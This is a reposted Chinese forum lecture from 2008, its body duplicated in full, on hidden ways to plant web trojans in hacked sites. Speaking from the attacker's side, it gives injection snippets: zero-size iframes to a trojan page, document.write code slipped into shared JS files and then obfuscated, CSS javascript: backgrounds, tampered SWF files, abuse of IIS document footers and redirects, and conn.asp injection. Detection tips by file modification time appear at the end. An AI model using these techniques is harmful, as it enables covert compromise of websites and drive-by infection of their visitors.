隐蔽挂马的种种方式
时间:2008-03-30 08:42:09 来源:站友论坛 广告:亚洲交友中心
日期:3月28号晚上8.30
主讲:砸你家玻璃QQ:34435184
主题:隐蔽挂马的种种方式
出处:http://bbs.foradmin.com
站友群:17770150
人家都说不要做损人利已的事,所以有很大一部分人搞了你的站损人不利已的事他是不会做的
一定是要利已
那当然是挂马了,要不然入侵你的站也不会那么有激情
挂马的方式多种多样,最常见的就是框架挂马
不过这种挂马只能对付懒管理员,
如果管理员稍勤快些,
就能发现出异常
<iframe src=http://XXXXXX/xxx.htm width=0 height=0></iframe>
这种框架语句,新建一个框架,高度为0宽度为0
打开你的网页后,这个网页一切都在不知道所以然的情况下打开了网页木马的页面
不过这种方式最好找,上次我听那个站长说直接查找<iframe
这种语句就可以找到
其实这种现在挂马的人稍聪明些,
都不会再用了,太不安全了
持久力也不常,所以有了这种人法挂马,
拿我们的站友站来举列子吧
请打开偶们的站友网
假如黑客拿到了SHELL,IIS上又没有设置好权限的话,那么,我们现在右键,查看这个源码,发现里面有一句
14和15行里面有这样两句
<script src="/include/js/ajax.js" type="text/javascript"></script>
<script src="/include/js/common.js" type="text/javascript"></script>
大家想到了什么,
第一个,应该是站友网的阿江统计里的一个JS文件
我们就改这个JS
文件,
不用改首页,站长已经帮我们调用好咧
这个网页里面调用的文件有几十个,
要找,笨站长也得好好思考一番了
JS的挂马代码一般都是这样的document.write("<iframe <iframe src=http://你的木马路经/tzd.htm width=0 height=0></iframe>");
如果可行的话,完全可以把它的JS挂上我们的代码之后全加密了,
让站长看不懂,解不了,如果没有备份的话
那他就只有干看的份了
还有就是同上的,CSS挂马方式
也是结合主页的CSS文件调用,再调用到我们的网马的
body { background-image: url(javascript:document.write("<Iframe src=http://192.168.0.5/te
st.htm width=0 height=0></iframe>")) }
body
{
background-image: url(javascriptopen(http://192.168.0.5/test.htm,newwindow,height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no))
}
CSS挂马的代码等等云 说白了都是转向
可查性非常的强
难找是难找,不过还是能找得到
我用过一个让网站改版的方法,站长就从来没有发现过我的挂马方法
那就是,改一个SWF文件
先下载他网站上主页上调用的任意一个SWF文件
用闪客精灵反编出源码
然后用FLASH里面加上一段转向网址
on (release) {
getURL("javascript:window.external.AddFavorite('http://www.xxx.com','我是木马');");
}
加上这么一句,然后发布文件,上传替换站长的FLASH文件
这样的FLASH文件虽然不会不查觉,打开木马站之后也是光明正大的,而且不会无显示,但是却难查,
因为正常情况下,FLASH的文件是无法查出源码的,而真正的源码是要经过编译后才可以看得到的,一个服务器里的FLASH文件站长要一个一个的打开找,,看问题出在哪里了,才能试得出
不过也得首先是他先想得到是FLASH文件
如果你的站是全ASP的话不是生成HTML的那种站,查找木马的方式,一般不用从分别代码上入手
直接用WINDOWS自带的查找工能就OK了,查找什么?代码?错
是文件的修改日期
不管是挂马者以什么方式挂在你的网站目录文件上的木马,总跟你建站的时间是不同的
不过要是自动生成HTML的那种网站,用这方法,查起来挺废事
自动生成HTML的那种网站,网站管理员也一般都是设置主页不变,别的页一般都有可写权限的,因为是自动生成么,所以挂马更好玩,权限也更自由一些
自动生成HTML的那种站的源码程序,一般网站管理员大部分都是把主页设置的权限很好,而别的其实也大都是无能为力的
说白了,查网马最好的方式还是查看修改时间,必竟,当天的东西,改变的哪些,自己最知道
好了,到了尾声还有一种办法
那就是当入侵到最高一层的时候
IIS挂马
当然,是这种情况,那就任于人处置了,有一种更让你意想不到的,连查看修改文件也查不出来的,可能会让你一头雾水,也是现在玩HACK这些人的最常用挂马方式
不过那是得在得到服务器管理员权限的时候才能做的事
大家都知道,我们在尝试一些免费空间的试用时候
都会弹给广告,而我们上传的网页上根本没有这些源码,这是哪弹出来的?怎么会弹得出来呢?他们是怎么做到的?我们要的就是做到这些,用他们的弹广告的方法,弹我们的网马
这都说到,启用文档页脚的方法了
点击IIS网站的目录设置
网站的属性上选"文档"我们都会在这里选上IIS默认的几个打开网页,一般为
default.htm
index.htm
main.htm
login.htm
等,随我们设置,我们打开一个网站的时候,网站以这个为优先打开我们的这些网页
在下面注意的有一项,,启用文档页脚...
就是这个东西,我们可以放一个文件
指向它,然后整站所有的文件,访问任何一个,都会使你的网马打开
而你查看你的网页代码,,,还是修改时间,还是原封不动的在那里
这样,你就只有去向你的服务商交涉了,不过前提还是,,,你想到了这一点~!
假设就如你用的不是托管的
就是用的自己的主机建的网站,好
那么也可以使用IIS的网页重定向功能
就像站长的那种一访问不到文件就转向一个页面一样
不要整个目录的设置,完全可以,随便在大堆的文件里设置上十几个,几十个,这里设置一个文件,那里设置一个件,有的网站文件多,站长怎么可能一个一个的文件查到呢哈哈,解决办法,```IS咧
重装IIS咧
补充一下,还有一种挂马方式
是CONN.asp文件挂马,把框架转向写入CONN.asp使每个与数据库有交互的文件,都有你的网页代码,而文件本身却没有代,代码在CONN.asp里,方法同上不算太高级,用搜索最近修改的文件,就可以搜得出来是conn.asp出现的问题
好了,还有等等多代码,不过都千篇以律
最难想到的,和想到也难解决的,以我挂马的经验来觉得
当属.SWF和IIS难查
其余也都简单,可以说没有查不到的马,挂马方式再好玩,也离不开这些方法,主要的就是文件的修改时间,先过滤出来,然后再查,是很省省事的,对了,还有,查代码的挂马,一般去搜scr=这个
完了,强奸了大家的耳朵,说了些地球人都知道的废话,感觉很班门弄斧了
主讲:砸你家玻璃QQ:34435184
主题:隐蔽挂马的种种方式
出处:http://bbs.foradmin.com
站友群:17770150
人家都说不要做损人利已的事,所以有很大一部分人搞了你的站损人不利已的事他是不会做的
一定是要利已
那当然是挂马了,要不然入侵你的站也不会那么有激情
挂马的方式多种多样,最常见的就是框架挂马
不过这种挂马只能对付懒管理员,
如果管理员稍勤快些,
就能发现出异常
<iframe src=http://XXXXXX/xxx.htm width=0 height=0></iframe>
这种框架语句,新建一个框架,高度为0宽度为0
打开你的网页后,这个网页一切都在不知道所以然的情况下打开了网页木马的页面
不过这种方式最好找,上次我听那个站长说直接查找<iframe
这种语句就可以找到
其实这种现在挂马的人稍聪明些,
都不会再用了,太不安全了
持久力也不常,所以有了这种人法挂马,
拿我们的站友站来举列子吧
请打开偶们的站友网
假如黑客拿到了SHELL,IIS上又没有设置好权限的话,那么,我们现在右键,查看这个源码,发现里面有一句
14和15行里面有这样两句
<script src="/include/js/ajax.js" type="text/javascript"></script>
<script src="/include/js/common.js" type="text/javascript"></script>
大家想到了什么,
第一个,应该是站友网的阿江统计里的一个JS文件
我们就改这个JS
文件,
不用改首页,站长已经帮我们调用好咧
这个网页里面调用的文件有几十个,
要找,笨站长也得好好思考一番了
JS的挂马代码一般都是这样的document.write("<iframe <iframe src=http://你的木马路经/tzd.htm width=0 height=0></iframe>");
如果可行的话,完全可以把它的JS挂上我们的代码之后全加密了,
让站长看不懂,解不了,如果没有备份的话
那他就只有干看的份了
还有就是同上的,CSS挂马方式
也是结合主页的CSS文件调用,再调用到我们的网马的
body { background-image: url(javascript:document.write("<Iframe src=http://192.168.0.5/te
st.htm width=0 height=0></iframe>")) }
body
{
background-image: url(javascriptopen(http://192.168.0.5/test.htm,newwindow,height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no))
}
CSS挂马的代码等等云 说白了都是转向
可查性非常的强
难找是难找,不过还是能找得到
我用过一个让网站改版的方法,站长就从来没有发现过我的挂马方法
那就是,改一个SWF文件
先下载他网站上主页上调用的任意一个SWF文件
用闪客精灵反编出源码
然后用FLASH里面加上一段转向网址
on (release) {
getURL("javascript:window.external.AddFavorite('http://www.xxx.com','我是木马');");
}
加上这么一句,然后发布文件,上传替换站长的FLASH文件
这样的FLASH文件虽然不会不查觉,打开木马站之后也是光明正大的,而且不会无显示,但是却难查,
因为正常情况下,FLASH的文件是无法查出源码的,而真正的源码是要经过编译后才可以看得到的,一个服务器里的FLASH文件站长要一个一个的打开找,,看问题出在哪里了,才能试得出
不过也得首先是他先想得到是FLASH文件
如果你的站是全ASP的话不是生成HTML的那种站,查找木马的方式,一般不用从分别代码上入手
直接用WINDOWS自带的查找工能就OK了,查找什么?代码?错
是文件的修改日期
不管是挂马者以什么方式挂在你的网站目录文件上的木马,总跟你建站的时间是不同的
不过要是自动生成HTML的那种网站,用这方法,查起来挺废事
自动生成HTML的那种网站,网站管理员也一般都是设置主页不变,别的页一般都有可写权限的,因为是自动生成么,所以挂马更好玩,权限也更自由一些
自动生成HTML的那种站的源码程序,一般网站管理员大部分都是把主页设置的权限很好,而别的其实也大都是无能为力的
说白了,查网马最好的方式还是查看修改时间,必竟,当天的东西,改变的哪些,自己最知道
好了,到了尾声还有一种办法
那就是当入侵到最高一层的时候
IIS挂马
当然,是这种情况,那就任于人处置了,有一种更让你意想不到的,连查看修改文件也查不出来的,可能会让你一头雾水,也是现在玩HACK这些人的最常用挂马方式
不过那是得在得到服务器管理员权限的时候才能做的事
大家都知道,我们在尝试一些免费空间的试用时候
都会弹给广告,而我们上传的网页上根本没有这些源码,这是哪弹出来的?怎么会弹得出来呢?他们是怎么做到的?我们要的就是做到这些,用他们的弹广告的方法,弹我们的网马
这都说到,启用文档页脚的方法了
点击IIS网站的目录设置
网站的属性上选"文档"我们都会在这里选上IIS默认的几个打开网页,一般为
default.htm
index.htm
main.htm
login.htm
等,随我们设置,我们打开一个网站的时候,网站以这个为优先打开我们的这些网页
在下面注意的有一项,,启用文档页脚...
就是这个东西,我们可以放一个文件
指向它,然后整站所有的文件,访问任何一个,都会使你的网马打开
而你查看你的网页代码,,,还是修改时间,还是原封不动的在那里
这样,你就只有去向你的服务商交涉了,不过前提还是,,,你想到了这一点~!
假设就如你用的不是托管的
就是用的自己的主机建的网站,好
那么也可以使用IIS的网页重定向功能
就像站长的那种一访问不到文件就转向一个页面一样
不要整个目录的设置,完全可以,随便在大堆的文件里设置上十几个,几十个,这里设置一个文件,那里设置一个件,有的网站文件多,站长怎么可能一个一个的文件查到呢哈哈,解决办法,```IS咧
重装IIS咧
补充一下,还有一种挂马方式
是CONN.asp文件挂马,把框架转向写入CONN.asp使每个与数据库有交互的文件,都有你的网页代码,而文件本身却没有代,代码在CONN.asp里,方法同上不算太高级,用搜索最近修改的文件,就可以搜得出来是conn.asp出现的问题
好了,还有等等多代码,不过都千篇以律
最难想到的,和想到也难解决的,以我挂马的经验来觉得
当属.SWF和IIS难查
其余也都简单,可以说没有查不到的马,挂马方式再好玩,也离不开这些方法,主要的就是文件的修改时间,先过滤出来,然后再查,是很省省事的,对了,还有,查代码的挂马,一般去搜scr=这个
完了,强奸了大家的耳朵,说了些地球人都知道的废话,感觉很班门弄斧了
上一篇:极疯坚信:优化实例
下一篇:至尊宝做短信联盟的一些技巧!
评论加载中…
